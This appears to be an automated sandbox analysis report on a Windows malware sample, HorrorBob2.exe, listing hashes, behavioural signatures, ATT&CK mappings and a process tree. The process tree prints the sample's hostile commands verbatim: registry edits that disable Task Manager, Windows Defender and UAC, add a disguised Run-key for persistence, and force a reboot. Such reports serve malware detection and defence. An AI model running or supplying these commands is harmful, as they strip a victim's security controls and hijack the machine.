Analysis
-
max time kernel
9s -
max time network
12s -
platform
windows11-21h2_x64 -
resource
win11-20241007-en -
resource tags
arch:x64arch:x86image:win11-20241007-enlocale:en-usos:windows11-21h2-x64system -
submitted
08-11-2024 14:13
Behavioral task
behavioral1
Sample
Dest/HorrorBob2.exe
Resource
win11-20241007-en
Behavioral task
behavioral2
Sample
Dest/HorrorRansom 1.0 Final.exe
Resource
win11-20241007-en
Behavioral task
behavioral3
Sample
Dest/HorrorTrojan Ultimate Edition.exe
Resource
win11-20241007-en
Behavioral task
behavioral4
Sample
Dest/HorrorTrojan123.exe
Resource
win11-20241007-en
Behavioral task
behavioral5
Sample
Dest/Start.bat
Resource
win11-20241007-en
Behavioral task
behavioral6
Sample
Dest/covid20.exe
Resource
win11-20241007-en
Errors
General
-
Target
Dest/HorrorBob2.exe
-
Size
11.9MB
-
MD5
9331b20120075b2685d3888c196f2e34
-
SHA1
1af7d3dc4576ef8aaa06fa3199cf422b7657950b
-
SHA256
98a804d373c7e0e4f80155df20358436e066ecf31c522c31df2ba46923ac68c2
-
SHA512
83636067d46b1362a6e0e5af56222d170d337fa7b0c4048b8f04c9df0ca35c3634a7254e6226886b00f9894e4353d6ac6b2e4e760bab320058cebe37c7c0cd7b
-
SSDEEP
196608:zHvwfYWqhZPHE5D7cdPNPi17S+IRTX7UYVlj0EcLnKXanF6eeBUsjD2ABShiFiJt:vZ8R7c5527SpRTXQYVlYEGnKKF6eeWgO
Malware Config
Signatures
-
Processes:
reg.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reg.exe -
Disables Task Manager via registry modification
-
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
reg.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Acer NitroSense Update = "C:\\Service64\\Service64.exe" reg.exe -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
Processes:
reg.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-2253712635-4068079004-3870069674-1000\Control Panel\Desktop\Wallpaper = "c:\\Service64\\blood.bmp" reg.exe -
Processes:
resource yara_rule behavioral1/memory/2884-0-0x0000000000400000-0x000000000132F000-memory.dmp upx C:\Users\Admin\AppData\Local\Temp\A345.tmp\Service64.exe upx behavioral1/memory/2884-18-0x0000000000400000-0x000000000132F000-memory.dmp upx -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 13 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
Processes:
reg.exereg.exereg.exereg.exereg.exereg.exerundll32.exenet.exenet1.exeshutdown.exeHorrorBob2.execmd.execscript.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language shutdown.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language HorrorBob2.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cscript.exe -
Modifies data under HKEY_USERS 15 IoCs
Processes:
LogonUI.exedescription ioc process Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglow = "3288365268" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglowBalance = "10" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292114432" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\StartColorMenu = "4290799360" LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM LogonUI.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentPalette = 99ebff004cc2ff000091f8000078d4000067c000003e9200001a6800f7630c00 LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\AutoColor = "0" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292114432" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColor = "3288365268" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColorBalance = "89" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationBlurBalance = "1" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\EnableWindowColorization = "200" LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent LogonUI.exe -
Modifies registry key 1 TTPs 3 IoCs
-
Runs net.exe
-
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
shutdown.exedescription pid process Token: SeShutdownPrivilege 1044 shutdown.exe Token: SeRemoteShutdownPrivilege 1044 shutdown.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
LogonUI.exepid process 1780 LogonUI.exe -
Suspicious use of WriteProcessMemory 36 IoCs
Processes:
HorrorBob2.execmd.exenet.exedescription pid process target process PID 2884 wrote to memory of 3920 2884 HorrorBob2.exe cmd.exe PID 2884 wrote to memory of 3920 2884 HorrorBob2.exe cmd.exe PID 2884 wrote to memory of 3920 2884 HorrorBob2.exe cmd.exe PID 3920 wrote to memory of 1320 3920 cmd.exe cscript.exe PID 3920 wrote to memory of 1320 3920 cmd.exe cscript.exe PID 3920 wrote to memory of 1320 3920 cmd.exe cscript.exe PID 3920 wrote to memory of 2532 3920 cmd.exe reg.exe PID 3920 wrote to memory of 2532 3920 cmd.exe reg.exe PID 3920 wrote to memory of 2532 3920 cmd.exe reg.exe PID 3920 wrote to memory of 4756 3920 cmd.exe reg.exe PID 3920 wrote to memory of 4756 3920 cmd.exe reg.exe PID 3920 wrote to memory of 4756 3920 cmd.exe reg.exe PID 3920 wrote to memory of 244 3920 cmd.exe rundll32.exe PID 3920 wrote to memory of 244 3920 cmd.exe rundll32.exe PID 3920 wrote to memory of 244 3920 cmd.exe rundll32.exe PID 3920 wrote to memory of 4840 3920 cmd.exe reg.exe PID 3920 wrote to memory of 4840 3920 cmd.exe reg.exe PID 3920 wrote to memory of 4840 3920 cmd.exe reg.exe PID 3920 wrote to memory of 2368 3920 cmd.exe reg.exe PID 3920 wrote to memory of 2368 3920 cmd.exe reg.exe PID 3920 wrote to memory of 2368 3920 cmd.exe reg.exe PID 3920 wrote to memory of 104 3920 cmd.exe reg.exe PID 3920 wrote to memory of 104 3920 cmd.exe reg.exe PID 3920 wrote to memory of 104 3920 cmd.exe reg.exe PID 3920 wrote to memory of 4836 3920 cmd.exe reg.exe PID 3920 wrote to memory of 4836 3920 cmd.exe reg.exe PID 3920 wrote to memory of 4836 3920 cmd.exe reg.exe PID 3920 wrote to memory of 4844 3920 cmd.exe net.exe PID 3920 wrote to memory of 4844 3920 cmd.exe net.exe PID 3920 wrote to memory of 4844 3920 cmd.exe net.exe PID 4844 wrote to memory of 1264 4844 net.exe net1.exe PID 4844 wrote to memory of 1264 4844 net.exe net1.exe PID 4844 wrote to memory of 1264 4844 net.exe net1.exe PID 3920 wrote to memory of 1044 3920 cmd.exe shutdown.exe PID 3920 wrote to memory of 1044 3920 cmd.exe shutdown.exe PID 3920 wrote to memory of 1044 3920 cmd.exe shutdown.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\Dest\HorrorBob2.exe"C:\Users\Admin\AppData\Local\Temp\Dest\HorrorBob2.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2884 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\A345.tmp\HorrorBob2.bat" "2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3920 -
C:\Windows\SysWOW64\cscript.execscript prompt.vbs3⤵
- System Location Discovery: System Language Discovery
PID:1320 -
C:\Windows\SysWOW64\reg.exereg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f3⤵
- System Location Discovery: System Language Discovery
- Modifies registry key
PID:2532 -
C:\Windows\SysWOW64\reg.exereg add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d c:\Service64\blood.bmp /f3⤵
- Sets desktop wallpaper using registry
- System Location Discovery: System Language Discovery
PID:4756 -
C:\Windows\SysWOW64\rundll32.exeRUNDLL32.EXE user32.dll,UpdatePerUserSystemParameters3⤵
- System Location Discovery: System Language Discovery
PID:244 -
C:\Windows\SysWOW64\reg.exereg.exe ADD HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop /v NoChangingWallPaper /t REG_DWORD /d 1 /f3⤵
- System Location Discovery: System Language Discovery
- Modifies registry key
PID:4840 -
C:\Windows\SysWOW64\reg.exeReg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f3⤵
- System Location Discovery: System Language Discovery
PID:2368 -
C:\Windows\SysWOW64\reg.exereg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f3⤵
- UAC bypass
- System Location Discovery: System Language Discovery
- Modifies registry key
PID:104 -
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Acer NitroSense Update" /t REG_SZ /F /D "C:\Service64\Service64.exe"3⤵
- Adds Run key to start application
- System Location Discovery: System Language Discovery
PID:4836 -
C:\Windows\SysWOW64\net.exenet user Admin /fullname:"SPONGEBOB IS WATCHING YOU!"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4844 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 user Admin /fullname:"SPONGEBOB IS WATCHING YOU!"4⤵
- System Location Discovery: System Language Discovery
PID:1264 -
C:\Windows\SysWOW64\shutdown.exeshutdown /r /t 003⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:1044
-
C:\Windows\system32\LogonUI.exe"LogonUI.exe" /flags:0x4 /state0:0xa3a12055 /state1:0x41c64e6d1⤵
- Modifies data under HKEY_USERS
- Suspicious use of SetWindowsHookEx
PID:1780
Network
MITRE ATT&CK Enterprise v15
Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Impair Defenses
1Disable or Modify Tools
1Modify Registry
4Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
5KB
MD5b11c0b55dba339bbe3169584fa0eedd8
SHA18c201122fd73cea5d8d2aa2aa6f7c17d99b521d9
SHA256f73a510ebd7495f8432b489009aeed5ae7c945ccf68ec3baf88605aeefb2d073
SHA5128424ce9a6af67721c6df13edbfbe9e48ad1eb014e19c6952afd4158c16762cf65092e6ef459a98680673e30c86da9ba9aaf2aca309426b9237bfcf893ed40006
-
Filesize
11.4MB
MD5b53852cb556ec28efc39b986caddb791
SHA15ce0819a7b1703f67272fa0f21546d0a8b2d7b0a
SHA256ae8cd9b5396770fa3c77140246365c3c501ece718b52fd6b7faed85c26b25d2a
SHA5127da30187b939c91d045dbe9cfe8daa209d539ca865d759bde4be1c8f4f96fac5f5747ec1be1937eb00034bf531391788586c5d6c3ee93c94d88201e3a1d52599
-
Filesize
3.8MB
MD5040d29b801e3488f7aee3f9708128eea
SHA1433591a971325f7529cbb7a1d16645ff65ee10c7
SHA256fe28980c6e213619a95e5991de2062a0187fc3054418e670e1c67d3c5b6b01de
SHA51279c64fce68a58fea469bb71dd1e10a3a2c1d4dc024635be2b8e29793bab8c34ba7afd402d47cce7826279512c7906f31fed9fe986024bc03a36dc094f7629826
-
Filesize
207B
MD552ac951762c9b42fb4492dfdde2ba4ae
SHA10821a0dea46432fc4db10a2dc6312d42a872ab9f
SHA2569bc399097468bb1f2f88250cb967b3db4d34d0a7836b73f262afe2b3ad393ba3
SHA512c91cf111b92f0f3218353e4e1700270730f2cbad54ab5d8fb368c6e87168be39f0b3e5a04d66b11bc5d93d6b4c4d03711b75e29a7af87d75c14dd296ad4ad530